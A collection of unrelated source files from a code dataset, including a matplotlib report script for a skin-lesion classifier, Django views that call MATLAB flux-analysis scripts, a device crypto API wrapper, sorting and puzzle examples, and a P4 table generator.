rect.get_height()\n        ax.text(rect.get_x() + rect.get_width()/2., height + .006,\n                '%.01f' % float(height * 100),\n                ha='center', va='bottom', fontsize=fontsize)\ndef report_chart_bars(datas, f=\"\", by=\"dermoscopic\"):\n    print(\"report_chart_bars->start,by=\", by)\n    colors = report_colors(type=\"bar\")\n    bar_width = 0.18\n    fontsize = 8\n    opacity = 1\n    plt.clf()\n    fig, ax = plt.subplots()\n    ind = 0\n    dlen = len(datas)\n    groups = [\"AUC\",\"SEN\",\"SPE\"]\n    index = np.arange(dlen)\n    for ind in range(dlen):\n        data = datas[ind]\n        #bdatas = np.zeros(dlen,dtype=float)\n        print(\"report_chart_bars->type=\",data[\"type\"])\n        #groups.append(data[\"type\"])\n        y_true = data[by][\"y_true\"]\n        y_pred = data[by][\"y_pred\"]\n        bdatas = report_auc_sen_spe(y_true,y_pred)\n        #bdatas[0] = roc_auc\n        rects = plt.bar(index + ind * bar_width, \n                bdatas, \n                bar_width,\n                alpha=opacity,\n                color=colors[ind],\n                label=data[\"type\"])\n        report_chart_autolabel(rects, ax, fontsize)\n    \n    ax.set_ylabel('Performance')\n    '''if by == \"dermoscopic\":\n        ax.set_xlabel(\"Performances tested by MClass-D using a prediction threshold of 0.5\")\n    else:\n        ax.set_xlabel(\"Performances tested by test-10 using a prediction threshold of 0.5\")\n    '''\n    ax.set_xticks(index + bar_width * (dlen - 1) / 2.0)\n    ax.set_xticklabels(tuple(groups))\n    ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.1),ncol=dlen)\n    ensure_dir_for_file(f)\n
    plt.savefig(f)\n    plt.close()\n    print(\"report_chart_bars->end,by=\", by)\ndef report_rocs_by(datas=[],f=\"\", by=\"dermoscopic\", show_d=True, title=\"\", marker=True):\n    print(\"report_rocs_by->start,by=\", by)\n    plt.clf()\n    ind = 0\n    #print(datas[0])\n    for ind in range(len(datas)):\n        data = datas[ind]\n        print(\"report_rocs_by->type=\",data[\"type\"])\n        y_true = data[by][\"y_true\"]\n        y_pred = data[by][\"y_pred\"]\n        report_show_roc(y_true, y_pred, data[\"type\"], ind, marker)\n        #ind += 1\n    #Dermatologists\n    if show_d :\n        ty_true, ty_preds = __test_doctor_performance_dermoscopic()\n        report_show_doctor(ty_true, ty_preds)\n    if title != \"\":\n        plt.title(title)\n    \n    plt.legend(loc = 'center right',scatterpoints=1)\n    plt.ylabel('Sensitivity')\n    plt.xlabel('1 - Specificity')\n    ensure_dir_for_file(f)\n    plt.savefig(f)\n    plt.close()\n    print(\"report_rocs_by->end,by=\", by)\ndef report_show_rocs_dermoscopic(datas, output_dir):\n    f = os.path.join(output_dir, \"roc_final_dermoscopic.jpg\")\n    report_rocs_by(datas,f=f, by=\"dermoscopic\", show_d=True, title=\"\")\ndef report_show_rocs_isic_test(datas, output_dir):\n    f = os.path.join(output_dir, \"roc_final_isic_test_doctor.jpg\")\n    report_rocs_by(datas,f=f, by=\"test\", show_d=True, title=\"\",marker=False)\n    f = os.path.join(output_dir, \"roc_final_isic_test.jpg\")\n    report_rocs_by(datas,f=f, by=\"test\", show_d=False, title=\"\",marker=False)\ndef report_show_rocs_isic_val(datas, output_dir):\n    f = os.path.join(output_dir, \"roc_final_isic_val_doctor.jpg\")\n    report_rocs_by(datas,f=f, by=\"val\", show_d=True, title=\"\",marker=False)\n    f = os.path.join(output_dir, \"roc_final_isic_val.jpg\")\n    report_rocs_by(datas,f=f, by=\"val\", show_d=False, title=\"\",marker=False)\ndef report_show_roc_detail(datas, output_dir):\n    #by=\"dermoscopic\"\n    labels = [\"val\",\"test\",\"dermoscopic\"]\n    for by in labels:\n        for ind in range(len(datas)):\n            data = datas[ind]\n            print(\"report_show_roc_detail->type=\",data[\"type\"])\n            y_true = data[by][\"y_true\"]\n            y_pred = data[by][\"y_pred\"]\n            report_print_by_threshold(y_true, y_pred, data[\"type\"], by)\n            f = os.path.join(output_dir, \"detail_roc_\" + by + \"_\" + data[\"type\"] + \".jpg\")\n            report_roc_by(y_true, y_pred, f=f, name = data[\"type\"], title=\"\", show_d = True, show_compare = True)\ndef report_print_by_threshold(y_true, y_pred, type, by):\n    fpr, tpr, threshold = metrics.roc_curve(y_true, y_pred)\n    n = len(tpr)\n    ret = \"\"\n    for i in range(n):\n        spe = 1 - fpr[i]\n        sen = tpr[i]\n        t = \"\\n%0.5f\\t%0.5f\\t%0.8f\" % (sen, spe, threshold[i])\n        ret += t\n    print(\"=====FINAL RESULT ========\", type, by)\n    print(ret)\n    print(\"=====END FINAL RESULT ========\", type, by)\ndef report_save_bars(datas, output_dir):\n    labels = [\"val\",\"test\",\"dermoscopic\"]\n    for by in labels:\n        f = os.path.join(output_dir, \"bar_\" + by + \".jpg\")\n        report_chart_bars(datas, f = f, by= by)\ndef main(FLAGS):\n    data_file = FLAGS.data_file\n    output_dir = FLAGS.output_dir\n    rdatas = report_load(data_file)\n    report_show_rocs_isic_test(rdatas,output_dir)\n    report_show_rocs_isic_val(rdatas,output_dir)\n    report_show_rocs_dermoscopic(rdatas,output_dir)\n    report_show_roc_detail(rdatas, output_dir)\n    report_save_bars(rdatas, output_dir)\n
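# Note (added): a tiny hand-checked example of report_auc_sen_spe() above, using\n# hypothetical scores and the fixed 0.5 threshold:\n#     y_true  = np.array([0, 0, 1, 1])\n#     y_proba = np.array([0.1, 0.6, 0.4, 0.8])\n#     report_auc_sen_spe(y_true, y_proba)  # -> [0.75, 0.5, 0.5]\n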
default='result/report-best_loss-InceptionV3',\n        help='output_dir'\n    )\n    FLAGS = parser.parse_args()\n    print(\"data_file=\", FLAGS.data_file)\n    print(\"output_dir=\", FLAGS.output_dir)\n    main(FLAGS)\n","sub_path":"src/run.report.viz.loss.py","file_name":"run.report.viz.loss.py","file_ext":"py","file_size_in_byte":13191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"79100357","text":"from django.db import models\nfrom django.utils import timezone\n\n\nclass Data(models.Model):\n    \"\"\" Analysis data class \"\"\"\n\n    # model fields are class attributes so that Django's ORM maps them to table columns\n    author = models.ForeignKey('auth.User', on_delete=models.CASCADE)\n    title = models.CharField(max_length=200)\n    text = models.TextField()\n    figures_int = models.IntegerField()\n    figures_float = models.FloatField()\n    created_date = models.DateTimeField(default=timezone.now)\n    published_date = models.DateTimeField(blank=True, null=True)\n\n    def publish(self):\n        \"\"\" Publish the data \"\"\"\n        self.published_date = timezone.now()\n        self.save()\n\n    def __str__(self):\n        return self.title\n","sub_path":"analysys/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"632640763","text":"from weakref import proxy\n\nimport numpy as np\nfrom matplotlib.backends.backend_qt5agg import (\n    FigureCanvasQTAgg as FigureCanvas)\nfrom matplotlib.figure import Figure\n\n\nclass BarPlotter2(FigureCanvas):\n    def __init__(self, ui_analyser, lst):\n        self.ui_analyser = proxy(ui_analyser)\n        self.fig = Figure(dpi=70)\n        self.axes = self.fig.add_subplot(111)  # create an axis\n        super(BarPlotter2, self).__init__(self.fig)\n        self.drawfigure(lst, self.ui_analyser.combobox_strategy.currentText(),\n                        self.ui_analyser.combobox_gamestage.currentText(),\n                        self.ui_analyser.combobox_actiontype.currentText())\n        self.ui_analyser.vLayout_bar.insertWidget(1, self)
\n\n    def drawfigure(self, lst, strategy, last_stage='All', last_action='All'):\n        self.fig.clf()\n        self.axes = self.fig.add_subplot(111)  # create an axis\n\n        p_name = str(strategy)\n        data = lst.get_stacked_bar_data('Template', p_name, 'stackedBar', last_stage=last_stage, last_action=last_action)\n\n        N = 11\n        Bluff = data[0]\n        BP = data[1]\n        BHP = data[2]\n        Bet = data[3]\n        Call = data[4]\n        Check = data[5]\n        Fold = data[6]\n        ind = np.arange(N)  # the x locations for the groups\n        width = 1  # the width of the bars: can also be len(x) sequence
\n\n        self.p0 = self.axes.bar(ind, Bluff, width, color='y')\n        self.p1 = self.axes.bar(ind, BP, width, color='k', edgecolor='black', bottom=Bluff)\n        self.p2 = self.axes.bar(ind, BHP, width, color='b', edgecolor='black', bottom=[sum(x) for x in zip(Bluff, BP)])\n        self.p3 = self.axes.bar(ind, Bet, width, color='c', edgecolor='black',\n                                bottom=[sum(x) for x in zip(Bluff, BP, BHP)])\n        self.p4 = self.axes.bar(ind, Call, width, color='g', edgecolor='black',\n                                bottom=[sum(x) for x in zip(Bluff, BP, BHP, Bet)])\n        self.p5 = self.axes.bar(ind, Check, width, color='w', edgecolor='black',\n                                bottom=[sum(x) for x in zip(Bluff, BP, BHP, Bet, Call)])\n        self.p6 = self.axes.bar(ind, Fold, width, color='r', edgecolor='black',\n                                bottom=[sum(x) for x in zip(Bluff, BP, BHP, Bet, Call, Check)])
\n\n        self.axes.set_ylabel('Profitability')\n        self.axes.set_title('FinalFundsChange ABS')\n        self.axes.set_xlabel(['PF Win', 'Loss', '', 'F Win', 'Loss', '', 'T Win', 'Loss', '', 'R Win', 'Loss'])\n        # plt.yticks(np.arange(0,10,0.5))\n        # 
self.c.tight_layout()\n        self.axes.legend((self.p0[0], self.p1[0], self.p2[0], self.p3[0], self.p4[0], self.p5[0], self.p6[0]),\n                         ('Bluff', 'BetPot', 'BetHfPot', 'Bet/Bet+', 'Call', 'Check', 'Fold'), labelspacing=0.03,\n                         prop={'size': 12})\n        i = 0\n        maxh = 0.02
\n        for rect0, rect1, rect2, rect3, rect4, rect5, rect6 in zip(self.p0.patches, self.p1.patches,\n                                                                   self.p2.patches,\n                                                                   self.p3.patches, self.p4.patches,\n                                                                   self.p5.patches, self.p6.patches):\n            g = list(zip(data[0], data[1], data[2], data[3], data[4], data[5], data[6]))\n            height = g[i]\n            i += 1\n            rect0.set_height(height[0])\n            rect1.set_y(height[0])\n            rect1.set_height(height[1])\n            rect2.set_y(height[0] + height[1])\n            rect2.set_height(height[2])\n            rect3.set_y(height[0] + height[1] + height[2])\n            rect3.set_height(height[3])\n            rect4.set_y(height[0] + height[1] + height[2] + height[3])\n            rect4.set_height(height[4])\n            rect5.set_y(height[0] + height[1] + height[2] + height[3] + height[4])\n            rect5.set_height(height[5])\n            rect6.set_y(height[0] + height[1] + height[2] + height[3] + height[4] + height[5])\n            rect6.set_height(height[6])\n            maxh = max(height[0] + height[1] + height[2] + height[3] + height[4] + height[5] + height[6], maxh)\n\n        # self.axes.set_ylim((0, maxh))\n\n        self.draw()\n","sub_path":"poker/gui/plots/bar_plotter_2.py","file_name":"bar_plotter_2.py","file_ext":"py","file_size_in_byte":4256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"375922197","text":"#-*- coding:utf-8 -*-\n#Filename:tanxin2.py\n#Date    :2018/9/11 1:36 PM\n#Author  :mudy\n#E-mail  :mudyabc@gmail.com\n#Blog    :txmudy.cn\n\n# -*- coding:utf-8 -*-\nimport timeit\n\ndef main():\n    s = [-1,1,2,3,4,5,-2,-3,-4,-7]\n\n    s_sum,s_max = 0,0\n\n    for i in range(len(s)):\n        s_sum += s[i]\n        if s_sum > s_max:\n            s_max = s_sum\n        elif s_sum < 0:  # once the running sum drops below 0 it can no longer contribute, so restart the sum from 0\n            s_sum = 0\n    print(\"maximum subarray sum:\", s_max)\n\n\nif __name__ == \"__main__\":\n    start = timeit.default_timer()\n    main()\n    end = timeit.default_timer()\n    print(\"execution time:\", end-start)  # CPU execution time","sub_path":"al/tanxin2.py","file_name":"tanxin2.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"360327072","text":"\"\"\"\n@author: jtusta\n@license: MIT Licence\n@contact: root@jtahstu.com\n@site: www.jtahstu.com\n@software: PyCharm Community Edition\n@file: quickSort.py\n@time: 2017/01/10 18:25\n\"\"\"\n\nlist = [5, 4, 7, 8, 9, 1, 2, 3]\nprint(list)\n\n\ndef quickSort(left, right):\n    if left > right:\n        return\n    temp = list[left]\n    i = left\n    j = right\n    while (i != j):\n        while list[j] >= temp and i < j:\n            j -= 1\n        while list[i] <= temp and i < j:\n            i += 1\n        if i < j:\n            list[i], list[j] = list[j], list[i]\n    list[left] = list[i]\n    list[i] = temp\n\n    quickSort(left, i - 1)\n    quickSort(i + 1, right)\n\n\nquickSort(0, len(list) - 1)\nprint(list)\n","sub_path":"Projects/Algorithm/AhaAlgorithm/quickSort.py","file_name":"quickSort.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"143498931","text":"# !/usr/bin/env python\n# -*- coding:utf-8 -*-\nimport json\nimport re\n\nfile_path = \"../data/idiom.json\"\n\n# find all idioms that contain the given word\ndef findIdiomsByWord(in_word):\n    with open( file_path, 'r' , encoding='utf-8' ) as f:\n        file_dict = json.load(f)\n    # match runs of Chinese characters; note that some idioms contain a comma!!!\n    word_pattern = \"([\u4e00-\u9fa5]*,?[\u4e00-\u9fa5]*\"+in_word+\"[\u4e00-\u9fa5]*,?[\u4e00-\u9fa5]*)\"\n    match_word_list 
= []\n for item in file_dict:\n if re.findall( word_pattern , item['word'] ):\n match_word_list.append(re.findall( word_pattern , item['word'] )[0])\n return match_word_list\n\nidioms_result = findIdiomsByWord(\"万夫\")\nprint(idioms_result)\n\n","sub_path":"scripts/idiomTools.py","file_name":"idiomTools.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"516070742","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# @Author: zealotnt\n# @Date: 2017-05-12 10:52:38\n\n#---- IMPORTS\nimport os\nimport serial\nimport struct\nimport binascii\nimport time\nimport sys\n\nfrom crc8 import crc8\nfrom utils import *\nfrom datalink_deliver import *\n\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives import hashes\n\n#---- CLASSES\nclass SiriusAPICrypto():\n\t\"\"\"\n\tSiriusAPICrypto class, implement crypto API of Sirius\n\t\"\"\"\n\tVERBOSE=False\n\n\t# SHA\n\tsha_dict = {\n\t\t\"SHA1\": 0,\n\t\t\"SHA224\": 1,\n\t\t\"SHA256\": 2,\n\t\t\"SHA384\": 3,\n\t\t\"SHA512\": 4,\n\t}\n\tsha_functions = {\n\t\t\"SHA1\": hashes.SHA1(),\n\t\t\"SHA224\": hashes.SHA224(),\n\t\t\"SHA256\": hashes.SHA256(),\n\t\t\"SHA384\": hashes.SHA384(),\n\t\t\"SHA512\": hashes.SHA512(),\n\t}\n\n\t# ECDSA\n\tecdsa_curve = {\n\t\t\"secp256k1\": 0,\n\t\t\"secp256r1\": 0,\n\t}\n\tecdsa_sha_functions = {\n\t\t\"SHA1\": 0,\n\t\t\"SHA256\": 1,\n\t}\n\n\t# DSA\n\tdsa_sha_functions = {\n\t\t\"SHA1\": 0,\n\t\t\"SHA256\": 1,\n\t}\n\n\t# AES\n\taes_key_length = [16, 24, 32]\n\taes_mode = {\n\t\t\"ECB_ENC\":\t0,\n\t\t\"ECB_DEC\":\t1,\n\t\t\"CBC_ENC\":\t2,\n\t\t\"CBC_DEC\":\t3,\n\t\t\"OFB_ENC\":\t4,\n\t\t\"OFB_DEC\":\t5,\n\t\t\"CFB_ENC\":\t6,\n\t\t\"CFB_DEC\":\t7,\n\t}\n\taes_block_size = 16\n\n\t# TDES\n\ttdes_key_length = [8, 16, 24]\n\ttdes_mode = {\n\t\t\"ECB_ENC\":\t0,\n\t\t\"ECB_DEC\":\t1,\n\t\t\"CBC_ENC\":\t2,\n\t\t\"CBC_DEC\":\t3,\n\t\t\"OFB_ENC\":\t4,\n\t\t\"OFB_DEC\":\t5,\n\t\t\"CFB_ENC\":\t6,\n\t\t\"CFB_DEC\":\t7,\n\t}\n\ttdes_block_size = 8\n\n\t# CMAC\n\tcmac_operation = {\n\t\t\"TDES\": 0,\n\t\t\"AES\": 1,\n\t}\n\tcmac_key_length = {\n\t\t\"TDES\": tdes_key_length,\n\t\t\"AES\": aes_key_length\n\t}\n\n\t# RSA\n\trsa_operations = {\n\t\t\"ENC\": 0,\n\t\t\"DEC\": 1,\n\t}\n\n\tdef __init__(self, bluefin_serial, verbose=False):\n\t\t\"\"\"\n\t\t\"\"\"\n\t\tself._datalink = bluefin_serial\n\t\tself.VERBOSE = verbose\n\n\t@staticmethod\n\tdef getShaMethodList():\n\t\tret = []\n\t\tfor key in SiriusAPICrypto.sha_dict:\n\t\t\tret.append(key)\n\t\treturn ret\n\n\t@staticmethod\n\tdef getShaMethodStr():\n\t\treturn ', '.join(['%s' % (key) for (key, value) in SiriusAPICrypto.sha_dict.items()])\n\n\tdef Trng(self, target, numberOfBytes):\n\t\t\"\"\"\n\n\t\t\"\"\"\n\t\tsirius_target = BluefinserialCommand.TARGET_APPLICATION if target == \"APP\" else BluefinserialCommand.TARGET_RF\n\t\tpkt = BluefinserialCommand(sirius_target)\n\t\ttrng_package = struct.pack(' method of hashing\n\t\tmessage: message to be hased\n\t\tisApp: if true, will send to Application processor\n\t\t\"\"\"\n\t\tif method not in SiriusAPICrypto.sha_dict:\n\t\t\tprint_err(\"Invalid method: %s\" % method)\n\t\t\treturn None\n\t\tsirius_target = BluefinserialCommand.TARGET_APPLICATION if target == \"APP\" else BluefinserialCommand.TARGET_RF\n\t\tpkt = BluefinserialCommand(sirius_target, verbose=verbose)\n\t\tsha_package = struct.pack('I', RSA_e)\n\t\t\t\tinfo.AddValList('RSA_e', RSA_e_str)\n\t\t\telif isinstance(RSA_e, str 
):\n\t\t\t\tinfo.AddValList('RSA_e', RSA_e)\n\t\t\telse:\n\t\t\t\tprint_err(\"Invalid value of RSA_e, abort\")\n\t\t\t\treturn None\n\n\t\tsirius_target = BluefinserialCommand.TARGET_APPLICATION if target == \"APP\" else BluefinserialCommand.TARGET_RF\n\n\t\tfor item in info.ValList():\n\t\t\tpkt = BluefinserialCommand(sirius_target, verbose=verbose)\n\t\t\tcmd = pkt.Packet('\\x8b', '\\x46', item)\n\t\t\trsp = self._datalink.Exchange(cmd)\n\t\t\tif (rsp is None):\n\t\t\t\tprint_err(\"Send fail\")\n\t\t\t\treturn None\n\t\t\tif rsp[2] != '\\x00':\n\t\t\t\tprint_err(\"Key download fail, code 0x%02x\" % ord(rsp[2]))\n\t\t\t\treturn None\n\t\treturn True\n\n\tdef EcdsaSign(self, target, curve, hashAlgo, message, verbose=False):\n\t\t\"\"\"\n\t\treturn:\n\t\t+ signature if success\n\t\t+ None if fail\n\t\t\"\"\"\n\t\tif curve not in SiriusAPICrypto.ecdsa_curve:\n\t\t\tprint_err(\"Invalid curve: %s\" % curve)\n\t\t\treturn None\n\t\tif hashAlgo not in SiriusAPICrypto.ecdsa_sha_functions:\n\t\t\tprint_err(\"Invalid hash: %s\" % hashAlgo)\n\t\t\treturn None\n\n\t\tsirius_target = BluefinserialCommand.TARGET_APPLICATION if target == \"APP\" else BluefinserialCommand.TARGET_RF\n\n\t\tpkt = BluefinserialCommand(sirius_target, verbose=verbose)\n\t\tecdsa_sign_package = struct.pack(' inputNumber:\n #print(memoryList)\n flag = False\n break\n\n squareSize += 2\n\ndef getNodeTypeA(memoryList, distToLeftNode, idx, inputNumber):\n calculatedValue = memoryList[idx - 1] + memoryList[idx + 1 - distToLeftNode]\n validateCurrentValue(calculatedValue, inputNumber)\n return calculatedValue\n\ndef getNodeTypeB(memoryList, distToLeftNode, idx, inputNumber):\n calculatedValue = memoryList[idx - 1] + memoryList[idx - 2] + memoryList[idx - distToLeftNode] + memoryList[idx + 1 - distToLeftNode]\n validateCurrentValue(calculatedValue, inputNumber)\n return calculatedValue\n\ndef getNodeTypeC(memoryList, distToLeftNode, idx, inputNumber):\n calculatedValue = memoryList[idx - 1] + memoryList[idx - distToLeftNode - 1] + memoryList[idx - distToLeftNode] + memoryList[idx + 1 - distToLeftNode]\n validateCurrentValue(calculatedValue, inputNumber)\n return calculatedValue\n\ndef getNodeTypeD(memoryList, distToLeftNode, idx, inputNumber):\n calculatedValue = memoryList[idx - 1] + memoryList[idx - distToLeftNode - 1] + memoryList[idx - distToLeftNode]\n validateCurrentValue(calculatedValue, inputNumber)\n return calculatedValue\n\ndef getNodeTypeE(memoryList, distToLeftNode, idx, inputNumber):\n calculatedValue = memoryList[idx - 1] + memoryList[idx - 1 - distToLeftNode]\n validateCurrentValue(calculatedValue, inputNumber)\n return calculatedValue\n\ndef validateCurrentValue(cV, inputNr):\n if cV > inputNr:\n print(\"THE ANSWER IS: \" + str(cV))\n return True\n else:\n return False\n\nif __name__==\"__main__\":\n main()\n","sub_path":"ac_task3_2.py","file_name":"ac_task3_2.py","file_ext":"py","file_size_in_byte":3807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"328744771","text":"from django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import render\nimport logging\nimport matlab.engine\nimport os\nimport json\nfrom escher import Builder\n\n\n# Create your views here.\n# 实例化两个logger用于记录日志\ninfo_logger = logging.getLogger('info_logger') # 记录正确的信息\nerror_logger = logging.getLogger('error_logger') # 记录错误的信息\n\n# matlabscript的路径\nviews_path = os.path.abspath(__file__)\nbackend_path = os.path.dirname(views_path)\nmatlabscript_path = os.path.join(backend_path, 
'matlabscript')\n\n\n# a test endpoint for logging and the MATLAB engine\ndef test_view_function(request):\n    log_message = request.path + ' ' + request.method\n    info_logger.info(log_message)\n\n    print('entered the test function')\n    request_json = json.loads(request.body)\n    num1 = request_json['num1']\n    num2 = request_json['num2']\n\n    try:\n        eng = matlab.engine.start_matlab()\n        eng.addpath(matlabscript_path)\n        result = eng.addFunction(num1, num2)\n        print(result)\n        return JsonResponse({'error_code': 0, 'result': result})\n    except Exception as e:\n        error_logger.info('error_message: ' + str(e))\n        return JsonResponse({'error_code': -1, 'error_message': e})
\n\n\n# a test endpoint for MATLAB struct return values\ndef test_struct_function(request):\n    log_message = request.path + ' ' + request.method\n    info_logger.info(log_message)\n\n    try:\n        eng = matlab.engine.start_matlab()\n        eng.addpath(matlabscript_path)\n        result = eng.testStruct()\n        print(result['age'])\n        print(result['weight'])\n        print(result['name'])\n        return JsonResponse({'result': result})\n    except Exception as e:\n        return JsonResponse({'msg': str(e)})
\n\n\ndef cofactor_analysis(request):\n    \"\"\"\n    cofactorFlux\n    :param request: headpath, username\n    :return: the result files are saved by the MATLAB script\n    \"\"\"\n    log_message = request.path + ' ' + request.method\n    info_logger.info(log_message)\n\n    request_json = json.loads(request.body)\n    headpath = request_json['headpath']\n    username = request_json['username']\n\n    try:\n        # on success, return a \"calculation succeeded\" message\n        eng = matlab.engine.start_matlab()\n        eng.addpath(matlabscript_path)\n        eng.mstpym(headpath, username, 'taskname', 'cofactorFlux')\n        return JsonResponse({\n            'code': 200,\n            'msg': 'calculation succeeded'\n        })\n    except Exception as e:\n        # on failure, return the error message\n        print(e)\n        error_logger.info('error_message: ' + str(e))\n        return JsonResponse({\n            'code': 500,\n            'msg': str(e),\n        })
\n\n\ndef FBA_caculation(request):\n    \"\"\"\n    FluxBA\n    :param request: headpath, username, FBA_kind\n    :return:\n    \"\"\"\n    log_message = request.path + ' ' + request.method\n    info_logger.info(log_message)\n\n    request_json = json.loads(request.body)\n    headpath = request_json['headpath']\n    username = request_json['username']\n    FBA_kind = request_json['FBA_kind']  # per the API this value is an integer\n\n    try:\n        # on success, return the calculated values\n        eng = matlab.engine.start_matlab()\n        eng.addpath(matlabscript_path)\n        theoutput = eng.mstpym(headpath, username, 'taskname', 'FluxBA', 'fluxes_ind', FBA_kind)\n        # print(theoutput)\n        return JsonResponse({\n            'code': 200,\n            'data': {\n                'biomass': theoutput['biomass'],\n                'maxYield': theoutput['max_yield'],\n                'prodLb': theoutput['prod_lb'],\n                'prodUb': theoutput['prod_ub'],\n                'totalrxn': theoutput['totalrxn'],\n            }\n        })\n    except Exception as e:\n        print(str(e))\n        error_logger.info('error_message: ' + str(e))\n        return JsonResponse({\n            'code': 500,\n            'msg': str(e),\n        })
\n\n\ndef FVA_caculation(request):\n    \"\"\"\n    FluxVA: saves a file named currentFVA.txt into the user's fluxes folder\n    :param request: headpath, username,\n    :return:\n    \"\"\"\n    log_message = request.path + ' ' + request.method\n    info_logger.info(log_message)\n\n    request_json = json.loads(request.body)\n    headpath = request_json['headpath']\n    username = request_json['username']\n\n    try:\n        # on success, return a success code\n        eng = matlab.engine.start_matlab()\n        eng.addpath(matlabscript_path)\n        eng.mstpym(headpath, username, 'taskname', 'FluxVA')\n        return JsonResponse({'code': 200})\n    except Exception as e:\n        # on failure, return the error message\n        print(str(e))\n        error_logger.info('error_message: ' + str(e))\n        return JsonResponse({\n            'code': 500,\n            'msg': str(e),\n        })
\n\n\ndef full_analysis(request):\n    \"\"\"\n    metFlux\n    :param request: headpath, username, met\n    :return:\n    \"\"\"\n    log_message = request.path + ' ' + request.method\n    info_logger.info(log_message)\n\n    request_json = json.loads(request.body)\n    headpath = request_json['headpath']\n    username = request_json['username']\n    met = request_json['met']\n\n    try:\n        eng = matlab.engine.start_matlab()\n        eng.addpath(matlabscript_path)\n        theoutput = eng.mstpym(headpath, username, 'taskname', 'metFlux', 'themet', met)\n        # TODO: the matlab-python docs say theoutput's return values are needed as well, but the py-java api does not unpack theoutput?\n        return JsonResponse({\n            'code': 200,\n        })\n    except Exception as e:\n        print(str(e))\n        # on failure, return the error message\n        error_logger.info('error_message' + str(e))\n        return JsonResponse({\n            'code': 500,\n            'msg': str(e),\n        })
\n\n\ndef model_info(request):\n    \"\"\"\n    modelInfo\n    :param request: headpath, username\n    :return:\n    \"\"\"\n    log_message = request.path + ' ' + request.method\n    info_logger.info(log_message)\n\n    request_json = json.loads(request.body)\n    headpath = request_json['headpath']\n    username = request_json['username']\n    print(headpath, username)\n\n    try:\n        eng = matlab.engine.start_matlab()\n        eng.addpath(matlabscript_path)\n        theoutput = eng.mstpym(headpath, username, 'taskname', 'modelInfo')\n        return JsonResponse({\n            'code': 200,\n            'data': {\n                'therxns': theoutput['therxns'],\n                'themets': theoutput['themets'],\n                'sub_str': theoutput['substr'],\n                # 'prod': theoutput['prod'],\n                'biomass': theoutput['biomass'],\n            }\n        })\n    except Exception as e:\n        print(str(e))\n        error_logger.info(str(e))\n        return JsonResponse({\n            'code': 500,\n            'msg': str(e),\n        })
\n\n\ndef out_image(request):\n    \"\"\"\n    Generate the template pathway map\n    :param request:\n    :return:\n    \"\"\"\n    log_message = request.path + \" \" + request.method\n    info_logger.info(log_message)\n\n    request_json = json.loads(request.body)\n    file_path = request_json['file_path']\n    print(file_path)\n\n    data = ''  # the HTML code to return\n    try:\n        # json_repr = 'iJO1366.Nucleotide-metabolism.json'\n        json_repr = file_path\n        builder = Builder(map_json=json_repr)\n        builder.save_html('example_map.html')\n\n        with open('example_map.html', 'r') as input_object:\n            data = input_object.read()\n\n        # delete the temporary example_map.html\n        if os.path.exists('example_map.html'):\n            os.remove('example_map.html')\n        return JsonResponse({\n            'code': 200,\n            'data': data\n        })\n    except Exception as e:\n        print(str(e))\n        error_logger.info(str(e))\n        return JsonResponse({\n            'code': 500,\n            'msg': str(e),\n        })
\n\n\ndef mat_info(request):\n    \"\"\"\n    Read the template to get the reference substrate, target product, biomass reaction and reaction name lists\n    :param request:\n    :return:\n    \"\"\"\n    log_message = request.path + ' ' + request.method\n    info_logger.info(log_message)\n\n    request_json = json.loads(request.body)\n    headpath = request_json['headpath']\n    username = request_json['username']\n    matFileName = request_json['matFileName']\n    pass\n","sub_path":"mst_py/backend/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"449902151","text":"import json\n\n# per-level ID counters and ternary-match priorities; index 0..4 = domain parts q1..q5\nglobalIDsT = [0, 0, 0, 0, 0]\nprioritiesT = [0, 0, 0, 0, 0]\nglobalIDT = 0\n\nglobalIDs = [0, 0, 0, 0, 0]\npriorities = [0, 0, 0, 0, 0]\nglobalID = 0\n\ndata = {}\ndata[\"target\"] = \"bmv2\"\ndata[\"p4info\"] = \"build/calc2.p4.p4info.txt\"\ndata[\"bmv2_json\"] = \"build/calc2.json\"\ndata[\"table_entries\"] = []\n\ndef dictSetUpT(partNum):
1):\n partsDict = {\n \"headers.q1_1.char\": [0, 255],\n \"headers.q1_2.char\": [0, 255],\n \"headers.q1_3.char\": [0, 255],\n \"headers.q1_4.char\": [0, 255],\n \"headers.q1_5.char\": [0, 255],\n \"headers.q1_6.char\": [0, 255],\n \"headers.q1_7.char\": [0, 255],\n \"headers.q1_8.char\": [0, 255],\n \"headers.q1_9.char\": [0, 255],\n \"headers.q1_10.char\": [0, 255],\n \"headers.q1_11.char\": [0, 255],\n \"headers.q1_12.char\": [0, 255],\n \"headers.q1_13.char\": [0, 255],\n \"headers.q1_14.char\": [0, 255],\n \"headers.q1_15.char\": [0, 255],\n \"headers.q1_16.char\": [0, 255],\n \"headers.q1_17.char\": [0, 255],\n \"headers.q1_18.char\": [0, 255],\n \"headers.q1_19.char\": [0, 255],\n \"headers.q1_20.char\": [0, 255],\n \"headers.q1_21.char\": [0, 255],\n \"headers.q1_22.char\": [0, 255],\n \"headers.q1_23.char\": [0, 255],\n \"headers.q1_24.char\": [0, 255],\n \"headers.q1_25.char\": [0, 255],\n \"headers.q1_26.char\": [0, 255],\n \"headers.q1_27.char\": [0, 255],\n \"headers.q1_28.char\": [0, 255],\n \"headers.q1_29.char\": [0, 255],\n \"headers.q1_30.char\": [0, 255],\n \"headers.q1_31.char\": [0, 255],\n \"headers.q1_32.char\": [0, 255]\n }\n return partsDict\n 